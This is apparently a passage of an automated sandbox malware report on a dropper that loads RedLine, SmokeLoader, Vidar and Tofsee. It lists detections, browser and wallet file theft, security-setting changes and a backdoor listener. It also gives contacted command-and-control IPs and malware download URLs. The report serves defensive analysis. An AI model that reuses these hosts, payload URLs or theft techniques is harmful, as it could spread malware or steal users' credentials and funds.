Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 1_2_00430B70 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 1_2_00430B70
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 19_2_0040AD40
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 19_2_0040ACA0
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: 21_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle, 21_2_0040405E
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00406C10 GetVersionExA,LoadLibraryA,WideCharToMultiByte,lstrlen,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,FreeLibrary, 19_2_00406C10

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 0000000A.00000002.540520363.0000028B27B02000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.540185555.0000028B27A13000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 22.2.3161.exe.3dcbb70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.3161.exe.3dcbb70.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.3161.exe.3beae80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.3161.exe.3beae80.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.3161.exe.3d27000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.3161.exe.3d27000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000002.468965698.0000000003B71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.469208214.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.469265641.0000000003D75000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 16.1.ewswwsi.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.4f4deRCUD7.exe.7915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.ewswwsi.7915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.4f4deRCUD7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.ewswwsi.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.4f4deRCUD7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.329414547.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.381470872.0000000001FA1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.329530861.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.318145695.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.380500232.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match File source: 00000013.00000002.411778643.0000000000A83000.00000004.00000001.sdmp, type: MEMORY
Yara detected Tofsee
Source: Yara match File source: 21.3.2961.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.2961.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.2961.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.2961.exe.790e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000003.401725714.00000000007B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.439382112.0000000000790000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.439136366.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2961.exe PID: 6620, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1E73.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000013.00000002.411778643.0000000000A83000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 22.2.3161.exe.3dcbb70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.3161.exe.3dcbb70.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.3161.exe.3beae80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.3161.exe.3beae80.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.3161.exe.3d27000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.3161.exe.3d27000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000002.468965698.0000000003B71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.469208214.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.469265641.0000000003D75000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match File source: 16.1.ewswwsi.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.4f4deRCUD7.exe.7915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.ewswwsi.7915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.4f4deRCUD7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.ewswwsi.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.4f4deRCUD7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.329414547.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.381470872.0000000001FA1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.329530861.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.318145695.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.380500232.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match File source: 00000013.00000002.411778643.0000000000A83000.00000004.00000001.sdmp, type: MEMORY
Yara detected Tofsee
Source: Yara match File source: 21.3.2961.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.2961.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.2961.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.2961.exe.790e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000003.401725714.00000000007B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.439382112.0000000000790000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.439136366.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2961.exe PID: 6620, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: 21_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname, 21_2_004088B0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 546824 Sample: 4f4deRCUD7.exe Startdate: 31/12/2021 Architecture: WINDOWS Score: 100 90 t.me 2->90 100 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->100 102 Multi AV Scanner detection for domain / URL 2->102 104 Found malware configuration 2->104 106 17 other signatures 2->106 11 4f4deRCUD7.exe 2->11         started        13 ewswwsi 2->13         started        16 svchost.exe 2->16         started        18 7 other processes 2->18 signatures3 process4 signatures5 20 4f4deRCUD7.exe 11->20         started        130 Machine Learning detection for dropped file 13->130 132 Contains functionality to inject code into remote processes 13->132 134 Injects a PE file into a foreign processes 13->134 23 ewswwsi 13->23         started        136 Changes security center settings (notifications, updates, antivirus, firewall) 16->136 25 MpCmdRun.exe 16->25         started        process6 signatures7 108 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 20->108 110 Maps a DLL or memory area into another process 20->110 112 Checks if the current machine is a virtual machine (disk enumeration) 20->112 27 explorer.exe 8 20->27 injected 114 Creates a thread in another existing process (thread injection) 23->114 32 conhost.exe 25->32         started        process8 dnsIp9 94 botmaybe11.mcdir.me 178.208.83.45, 443, 49863 VDSINA-ASRU Russian Federation 27->94 96 185.233.81.115, 443, 49761 SUPERSERVERSDATACENTERRU Russian Federation 27->96 98 15 other IPs or domains 27->98 80 C:\Users\user\AppData\Roaming\ewswwsi, PE32 27->80 dropped 82 C:\Users\user\AppData\Local\Temp\D845.exe, PE32 27->82 dropped 84 C:\Users\user\AppData\Local\Temp\9667.exe, PE32 27->84 dropped 86 7 other files (6 malicious) 27->86 dropped 138 System process connects to network (likely due to code injection or exploit) 27->138 140 Benign windows process drops PE files 27->140 142 Deletes itself after installation 27->142 144 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->144 34 1E73.exe 127 27->34         started        39 2961.exe 2 27->39         started        41 3161.exe 3 27->41         started        43 svchost.exe 1 27->43         started        file10 signatures11 process12 dnsIp13 92 file-file-host4.com 34->92 74 C:\Users\user\AppData\...\sqlite3[1].dll, PE32 34->74 dropped 76 C:\ProgramData\sqlite3.dll, PE32 34->76 dropped 116 Detected unpacking (changes PE section rights) 34->116 118 Detected unpacking (overwrites its own PE header) 34->118 120 Machine Learning detection for dropped file 34->120 128 3 other signatures 34->128 45 cmd.exe 1 34->45         started        78 C:\Users\user\AppData\Local\...\dkbkykdu.exe, PE32 39->78 dropped 47 cmd.exe 39->47         started        50 cmd.exe 39->50         started        52 sc.exe 39->52         started        58 2 other processes 39->58 122 Multi AV Scanner detection for dropped file 41->122 124 Sample uses process hollowing technique 41->124 126 Injects a PE file into a foreign processes 41->126 54 3161.exe 41->54         started        56 3161.exe 41->56         started        file14 signatures15 process16 file17 60 conhost.exe 45->60         started        62 timeout.exe 1 45->62         started        88 C:\Windows\SysWOW64\...\dkbkykdu.exe (copy), PE32 47->88 dropped 64 conhost.exe 47->64         started        66 conhost.exe 50->66         started        68 conhost.exe 52->68         started        70 conhost.exe 58->70         started        72 conhost.exe 58->72         started        process18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.158.215
 short.link United States
13335 CLOUDFLARENETUS true
188.166.28.199
 unknown Netherlands
14061 DIGITALOCEAN-ASNUS true
54.38.220.85
 unicupload.top France
16276 OVHFR true
162.159.135.233
 cdn.discordapp.com United States
13335 CLOUDFLARENETUS false
91.243.44.128
 unknown Russian Federation
395092 SHOCK-1US false
144.76.136.153
 transfer.sh Germany
24940 HETZNER-ASDE false
178.208.83.45
 botmaybe11.mcdir.me Russian Federation
48282 VDSINA-ASRU true
31.28.27.130
 file-file-host4.com Russian Federation
12616 HOSTING-MSKRU true
185.233.81.115
 unknown Russian Federation
50113 SUPERSERVERSDATACENTERRU true
164.132.207.80
 dodecoin.org France
16276 OVHFR true
185.7.214.171
 unknown France
42652 DELUNETDE true
67.199.248.14
 bitly.com United States
396982 GOOGLE-PRIVATE-CLOUDUS false
185.186.142.166
 unknown Russian Federation
204490 ASKONTELRU true
67.199.248.11
 bit.ly United States
396982 GOOGLE-PRIVATE-CLOUDUS false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
dodecoin.org 164.132.207.80 true
bitly.com 67.199.248.14 true
t.me 149.154.167.99 true
cdn.discordapp.com 162.159.135.233 true
file-file-host4.com 31.28.27.130 true
short.link 172.67.158.215 true
unicupload.top 54.38.220.85 true
botmaybe11.mcdir.me 178.208.83.45 true
host-data-coin-11.com 31.28.27.130 true
bit.ly 67.199.248.11 true
transfer.sh 144.76.136.153 true
privacytools-foryou-777.com 31.28.27.130 true
data-host-coin-8.com 31.28.27.130 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://cdn.discordapp.com/attachments/916319571638620172/925647741571452938/Pyroxylic.exe false
    		high
    http://185.7.214.171:8080/6.php true
    • URL Reputation: malware
    		 unknown
    http://host-data-coin-11.com/ true
    • URL Reputation: safe
    		 unknown
    https://dodecoin.org/dogewallet-setup.exe false
    • Avira URL Cloud: safe
    		 unknown
    https://botmaybe11.mcdir.me/file123.exe false
    • Avira URL Cloud: safe
    		 unknown
    https://short.link/u8txqc false
    • Avira URL Cloud: safe
    		 unknown
    https://bitly.com/a/blocked?hash=3eHgQQR&url=https%3A%2F%2Fcdn-131.anonfiles.com%2FP0m5w4j2xc%2Fcac3eb98-1640853984%2F%40Cryptobat9.exe false
      		high
      http://data-host-coin-8.com/game.exe true
      • Avira URL Cloud: malware
      		 unknown
      http://91.243.44.128/miner/new.exe true
      • Avira URL Cloud: malware
      		 unknown
      https://bit.ly/3eHgQQR false
        		high
        http://file-file-host4.com/tratata.php true
        • URL Reputation: safe
        		 unknown
        http://91.243.44.128/stlr/maps.exe true
        • Avira URL Cloud: malware
        		 unknown
        http://data-host-coin-8.com/files/2264_1640622147_2258.exe true
        • Avira URL Cloud: malware
        		 unknown
        pa:443 true
        • Avira URL Cloud: safe
        		 low
        http://unicupload.top/install5.exe true
        • URL Reputation: phishing
        		 unknown
        http://file-coin-host-12.com/ true
        • URL Reputation: safe
        		 unknown
        http://file-file-host4.com/sqlite3.dll true
        • URL Reputation: safe
        		 unknown
        parubey.info:443 true
        • Avira URL Cloud: safe
        		 unknown
        http://data-host-coin-8.com/files/5376_1640094939_1074.exe false
        • Avira URL Cloud: safe
        		 unknown
        http://privacytools-foryou-777.com/downloads/toolspab1.exe true
        • Avira URL Cloud: malware
        		 unknown
        https://transfer.sh/%28/8V4TRR/q.exe%29.zip false
          		high